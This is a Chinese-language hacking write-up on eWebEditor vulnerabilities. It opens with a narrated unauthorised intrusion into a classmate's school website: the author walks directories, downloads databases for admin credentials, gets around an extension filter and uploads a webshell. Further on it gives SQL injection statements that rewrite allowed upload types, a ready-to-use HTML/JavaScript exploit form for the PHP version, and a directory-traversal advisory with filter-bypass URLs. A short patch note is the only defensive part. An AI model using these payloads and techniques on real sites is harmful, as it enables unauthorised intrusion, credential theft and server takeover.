文章作者:yeshu
昨天很无聊,没事做就跑去检测同学学校的.
打开网站,找了下没找到..
-0看看有没有cookie注入也米用.都堵住了
图-1
找后台
http://www.xxxx.com/admin/admin_login.asp
试了下admin admin888
'or'='or'都没用
网上查了下这站也没有旁站
于是在看看网站图片属性
图-2
发现有ewebeditor
打开http://www.xxxx.com/admin/ewebeditor/admin_login.asp
图-3
发现后台被删了
在打开http://www.xxxx.com/admin/ewebeditor/db/ewebeditor.mdb
发现存在数据库,并下载
但打开数据库看后,没发现前辈留下的脚印
现在后台被删了,有没脚印于是想看看能否直接进后台样式
http://www.xxxx.com/admin/ewebeditor/admin_style.asp
图-4
直接进去了
但是我想直接在上面新增样式,却没用会跳转到admin_login.asp页面
图-5
郁闷了,不过想想既然可以直接这样输入地址进入样式管理项目,那试试可不可以直接输入上传文件管理的地方,这样就可以来遍历目录了
于是输入http://www.xxxx.com/admin/ewebeditor/admin_uploadfile.asp?id=22 成功进入
再继续来遍历目录了
http://www.xxxx.com/admin/ewebeditor/admin_uploadfile.asp?id=22&dir=../../..
图-6
继续遍历data目录
http://www.xxxx.com/admin/ewebeditor/admin_uploadfile.asp?id=22&dir=../../../data
(注意这里想遍历目录得自己手动在url上加上目录名才可以,若直接点网页上的链接浏览的话会直接跳转到admin_login.asp页面)
发现了数据库并下载得到后台账号密码
成功进入后台,但进后台后没发现可以利用的地方....遂放弃
再转战ewebeditor
继续看前面ewebedior是否还有利用的地方
前面在网页上点“添加样式”会跳到admin_login.asp,不知道为什么会这样?
然后就想先在自己电脑上的ewebeditor里面添加样式抓包,再把抓到的数据包改改地址给发送到目标网站上去,
结果测试nc提交后仍然会提示跳转到admin_login.asp
d_name=888&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=600&d_height=400&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=UploadFile%2F&d_basehref=http%3A%2F%2FLocalhost%2FeWebEditor%2F&d_contentpath=UploadFile%2F&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7Casa&d_imagesize=100&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cbmp&d_remotesize=100&d_memo=&x=29&y=14
想不通了..
最后再想想前面这个遍历目录时非得在url后面添加才可以浏览,那不相当于利用get方法提交数据么,难道这只能利用get方法提交才不会跳转到admin_login.asp页面
于是想着直接利用在网站上url上添加数据提交来直接添加样式
但至于怎么url我也不清楚,只知道抓包得到的
这个是要传递的数据
于是自己在本机上乱来,测试呗,
结果发现直接
这样就可以成功添加个样式,并且上传图片的格式可以是asa的。
图-7
但接下来又卡住了..
本来添加样式后就是添加栏了,
但自己在本机用同上的方法怎么测试,都不成功,郁闷了…
没办法了,但看看网站默认样式后面有个拷贝的选项
于是想着利用上面的方法拷贝个样式
然后再设置此样式里面的图片允许上传asa格式..,这样就好了,不用我自己来添加工具栏了
于是本机拷贝抓包发现提交http://www.xxxx.com/admin/ewebeditor/admin_style.asp?action=copy&id=14即可拷贝成功
图-8
成功在样式图片里面添加了asa格式
再http://www.xxxx.com/admin/ewebedito/
admin_style.asp?action=stylepreview&id=53预览此样式
打开上传图片的地方却发现还是不能上传asa格式文件
晕了,后台里明明现实可以提交asa格式的..
难道做了这么多,全是在自慰,只能看不能用的。。
火了,再用此方法,在自己电脑上测试却发现能行的通呀…
……………..
再跑去网站上看看那样式预览的结果,
Tmd的看了十几篇突然发现个问题..
这里面的gifjpgjpegbmp后面多了个 ""
图-9 10
然后想到会不是会管理员给过滤了asp了,
于是速度跑去用上面方法添加cer格式看看,发现也这样,可能也被过滤了
继续添加asaspp样式,过滤后asp后就剩下asp了
ok终于成功了
图-11
成功上传小马
图-12
最后admin_style.asp?action=styledel&id=55删除刚刚创建的样式 :注意后面的id得自己找对
条件:1、知道ewebeditor数据库的绝对地址
2、存在注入,或者后台可执行sql语句。
跨库注入:
update eWebEditor_Style in ‘E:\webhost\xxxxxxxx\www\admin\Editor\db\ewebeditor.mdb’ set s_imageext=’gif|jpg|jpeg|bmp|aasasa’ where s_id=40
或者
update eWebEditor_Style in ‘E:\webhost\xxxxxxxx\www\admin\Editor\db\ewebeditor.mdb’ set s_imageext=’gif|jpg|jpeg|bmp|aasasa’
利用:
/ewebeditor.asp?id=content1&style=standard
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
此漏洞仅测试了最新版v3.8,不知道低版本是否存在此漏洞。PHP版本的ewebeditor并没有使用数据库来保存配置信息,所有信息位于php/config.php中,代码如下:
<?php
$sUsername = "admin";
$sPassword = "admin";
$aStyle[1] = "gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1";
........
它将所有的风格配置信息保存为一个数组$aStyle,在register_global为on的情况下我们可以任意添加自己喜欢的风格,然后就可以在自己添加的风格中可以随意定义可上传文件类型。
这漏洞成因很简单,下面给个exp
<form action="" method=post enctype="multipart/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url value="http://192.168.1.110/eWebEditor/" size=100><br>
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
file:<input type=file name="uploadfile"><br>
<input type=button value=submit onclick=fsubmit()>
</form><br>
<script>
function fsubmit(){
form = document.forms[0];
form.action = form.url.value+'php/upload.php?action=save&type=FILE&style=toby57&language=en';
alert(form.action);
form.submit();
}
</script>
漏洞修补方法:
初始化数组$aStyle
<?php
$sUsername = "admin";
$sPassword = "admin";
$aStyle = array();
$aStyle[1] = "gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1";
#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: eWebeditor
# Version: all version
#################################################################
# Vulnerability Info:
# Type: Directory Traversal
# Risk: Medium
#################################################################
# Vulnerability:
# http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran@yahoo.com
###################################################################
出现漏洞的文件存在于ewebeditor/asp/browse.asp
ASP/Visual Basic代码
Function GetList()
Dim s_List, s_Url
s_List = ""
Dim oFSO, oUploadFolder, oUploadFiles, oUploadFile, sFileName
'Response.Write sCurrDir
'On Error Resume Next
Set oFSO = Server.CreateObject("Scripting.FileSystemObject")
Set oUploadFolder = oFSO.GetFolder(Server.MapPath(sCurrDir))
'注意一下sCurrDir变量,这个值等下我们可以用到
If Err.Number>0 Then
s_List = ""
Exit Function
End If
If sDir <> "" Then
If InstrRev(sDir, "/") > 1 Then
s_Url= Left(sDir, InstrRev(sDir, "/") - 1)
Else
s_Url = ""
End If
s_List = s_List & "" & _
"" & _
".." & _
" " & _
""
End If
'Response.Write sDir&"!"&s_List
Dim oSubFolder
For Each oSubFolder In oUploadFolder.SubFolders
'Response.Write oUploadFolder.SubFolders
If sDir = "" Then
s_Url = oSubFolder.Name
Else
s_Url = sDir & "/" & oSubFolder.Name
End If
s_List = s_List & "" & _
"" & _
"" & oSubFolder.Name & "" & _
" " & _
""
Next
'Response.Write s_List
Set oUploadFiles = oUploadFolder.Files
For Each oUploadFile In oUploadFiles
'Response.Write oUploadFile.Name
sFileName = oUploadFile.Name
If CheckValidExt(sFileName) = True Then
'这行让人有点郁闷,检测了所有允许的文件后缀,如不允许就无法列出,不然就不只列出目录名和图片文件了
If sDir = "" Then
s_Url = sContentPath & sFileName
Else
s_Url = sContentPath & sDir & "/" & sFileName
End If
s_List = s_List & "" & _
"" & FileName2Pic(sFileName) & "" & _
"" & sFileName & "" & _
"" & GetSizeUnit(oUploadFile.size) & "" & _
""
End If
Next
Set oUploadFolder = Nothing
Set oUploadFiles = Nothing
'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url
If sDir = "" Then
s_Url = ""
's_Url = "/"
Else
s_Url = "/" & sDir & ""
's_Url = "/" & sDir & "/"
End If
s_List = s_List & ""
s_List = HTML2JS(s_List)
'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url
s_List = "parent.setDirList(""" & s_List & """, """ & s_Url & """)"
GetList = s_List
End Function
'如果没有下面这步检测的话,应该就可以列出目录中所有的文件了,有点郁闷..现在只能列出允许后缀的文件和目录名
Function CheckValidExt(s_FileName)
If sAllowExt = "" Then
CheckValidExt = True
Exit Function
End If
Dim i, aExt, sExt
sExt = LCase(Mid(s_FileName, InStrRev(s_FileName, ".") + 1))
CheckValidExt = False
aExt = Split(LCase(sAllowExt), "|")
For i = 0 To UBound(aExt)
If aExt(i) = sExt Then
CheckValidExt = True
Exit Function
End If
Next
End Function
'我们顺着代码往下找,发现sCurrDir的值是通过下面的值得到的
Sub InitParam()
sType = UCase(Trim(Request.QueryString("type")))
sStyleName = Trim(Request.QueryString("style"))
Dim i, aStyleConfig, bValidStyle
bValidStyle = False
For i = 1 To Ubound(aStyle)
aStyleConfig = Split(aStyle(i), "|||")
If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then
bValidStyle = True
Exit For
End If
Next
If bValidStyle = False Then
OutScript("alert('Invalid Style.')")
End If
sBaseUrl = aStyleConfig(19)
'nAllowBrowse = CLng(aStyleConfig(43))
nAllowBrowse = 1
If nAllowBrowse <> 1 Then
OutScript("alert('Do not allow browse!')")
End If
sUploadDir = aStyleConfig(3)
If Left(sUploadDir, 1) <> "/" Then
Select Case sType
Case "REMOTE"
sUploadDir = "../../" & sUploadDir & "Image/"
Case "FILE"
sUploadDir = "../../" & sUploadDir & "Other/"
Case "MEDIA"
sUploadDir = "../../" & sUploadDir & "Media/"
Case "FLASH"
sUploadDir = "../../" & sUploadDir & "Flash/"
Case Else
sUploadDir = "../../" & sUploadDir & "Image/"
End Select
End If
'sUploadDir =sUploadDir &"/"
Select Case sBaseUrl
Case "0"
'sContentPath = aStyleConfig(23)
Select Case sType
Case "REMOTE"
sContentPath = "../" & aStyleConfig(3) & "Image/"
Case "FILE"
sContentPath = "../" & aStyleConfig(3) & "Other/"
Case "MEDIA"
sContentPath = "../" & aStyleConfig(3) & "Media/"
Case "FLASH"
sContentPath = "../" & aStyleConfig(3) & "Flash/"
Case Else
sContentPath = "../" & aStyleConfig(3) & "Image/"
End Select
Case "1"
sContentPath = RelativePath2RootPath(sUploadDir)
Case "2"
sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir))
End Select
Select Case sType
Case "REMOTE"
sAllowExt = aStyleConfig(10)
Case "FILE"
sAllowExt = aStyleConfig(6)
Case "MEDIA"
sAllowExt = aStyleConfig(9)
Case "FLASH"
sAllowExt = aStyleConfig(7)
Case Else
sAllowExt = aStyleConfig(8)
End Select
sCurrDir = sUploadDir '注意这里,这个是得到了配置的路径地址
sDir = Trim(Request("dir")) '得到dir变量
sDir = Replace(sDir, "\", "/") '对dir变量进行过滤
sDir = Replace(sDir, "../", "")
sDir = Replace(sDir, "./", "")
If sDir <> "" Then
If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then
sCurrDir = sUploadDir & sDir & "/"
'重点就在这里了,看到没有,当sUploadDir & sDir存在的时候,sCurrDir就为sUploadDir & sDir的值了
'虽然上面对sDir进行了过滤,不过我们完全可以跳过.具体利用st0p会在下面的利用中给出
Else
sDir = ""
End If
End If
End Sub
嘿嘿,看到这你应该明白了,其实就是对dir过滤的问题,我们完全可以构造特殊的值来跳过验证,这样就可以得到目录结构和显示设置文件中允许的文件后缀的文件了..
利用方法如下
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..
由于st0p测试的时候,上传目录是根目录下的uploadfile,通过上面的地址就可以得到根目录下的所有目录了.
嘿嘿,如果你发现打开的时候显示的是空白,不要灰心,这就对了,直接查看源代码,看到了吗,里面就有你根目录的目录名字了.
嘿嘿,他根目录下有个guest目录,我们通过下面的地址可以列出他下面的结构
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/…././/guest
然后我们也可以通过
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/../…././/..
可以往更上层跳,我测试的那个虚拟主机,得到的是www,logfile,datebase这三个目录.
